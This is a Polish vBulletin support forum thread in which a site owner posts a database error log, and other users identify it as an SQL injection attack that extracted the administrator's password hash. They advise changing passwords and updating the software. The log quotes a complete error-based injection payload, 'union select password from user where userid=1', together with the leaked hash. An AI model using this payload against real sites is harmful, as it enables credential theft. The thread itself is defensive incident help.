• Rejestracja
vBHELP.pl - polskie wsparcie vBulletin
  • Tagi:
Like Tree1Przydatne posty
  • 1 Autor WoG
  1. #1
    Marcin_J_ jest nieaktywny Stały bywalec
    Dołączył
    Nov 2010
    Posty
    110
    Przydatne posty
    9

    Domyślnie Błąd bazy danych

    Od jakiś 2 dni wywala mi taki błąd :

    Kod:
    Database error in vBulletin 4.0.8:
    
    Invalid SQL:
    
                                           SELECT socialgroupcategory.title
                                           FROM socialgroupcategory AS socialgroupcategory
                                           WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);
    
    MySQL Error   : Duplicate entry '34a177cdbb8e49c09a628916462da268:1' for key 1
    Error Number  : 1062
    Request Date  : Tuesday, November 22nd 2011 @ 09:00:45 AM
    Error Date    : Tuesday, November 22nd 2011 @ 09:00:45 AM
    O w tym chodzi ?



  2. #2
    Awatar pesclub
    pesclub jest nieaktywny Stały bywalec
    Dołączył
    Sep 2011
    Posty
    307
    Przydatne posty
    1

    Domyślnie

    coś masz z baza danych serwerem...


  3. #3
    Awatar WoG
    WoG
    WoG jest nieaktywny vB Specialist
    Dołączył
    Feb 2008
    Posty
    2 812
    Przydatne posty
    298
    Wpisów
    1

    Domyślnie

    To jest fragment ataku SQL Injection.
    Dokładnie tym zapytaniem atakujący zdobył: hasło administratora:
    Kod:
    (...) select password from user where userid=1 (...)
    Zmień hasło jak najszybciej i zaktualizuj skrypt.
    Marcin_J_ uważa to za przydatne.
    Z poważaniem,
    WoG

    Ty też możesz pomóc spolszczać vBulletin 5: GitHub.com
    "Rozczarowanie spowodowane niską jakością pamięta się długo po przeminięciu radości spowodowanej niską ceną"


  4. #4
    miszko jest nieaktywny Użytkownik
    Dołączył
    Apr 2011
    Posty
    57
    Przydatne posty
    5

    Domyślnie

    Dokładniej to "Duplicate entry '34a177cdbb8e49c09a628916462da268:1' for key 1" twój hash hasła (bez :1).
    Jakbyś go porównał z tym co masz w bazie, a tym co się wyświetlił.

    Zaktualizuj przynajmniej do 4.1.1 pl4.
    http://fiatklubpolska.pl - portal miłośników włoskiej motoryzacji


  5. #5
    Marcin_J_ jest nieaktywny Stały bywalec
    Dołączył
    Nov 2010
    Posty
    110
    Przydatne posty
    9

    Domyślnie

    Dzięki wielkie panowie , hasła już pozmieniane .
    Można sprawdzić jakoś dokładnie kto dobierał mi się do bazy ? :/


  6. #6
    Awatar WoG
    WoG
    WoG jest nieaktywny vB Specialist
    Dołączył
    Feb 2008
    Posty
    2 812
    Przydatne posty
    298
    Wpisów
    1

    Domyślnie

    Dochodzenie po adresie IP - innej opcji nie widzę.
    Z poważaniem,
    WoG

    Ty też możesz pomóc spolszczać vBulletin 5: GitHub.com
    "Rozczarowanie spowodowane niską jakością pamięta się długo po przeminięciu radości spowodowanej niską ceną"


Chmurka.pl

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67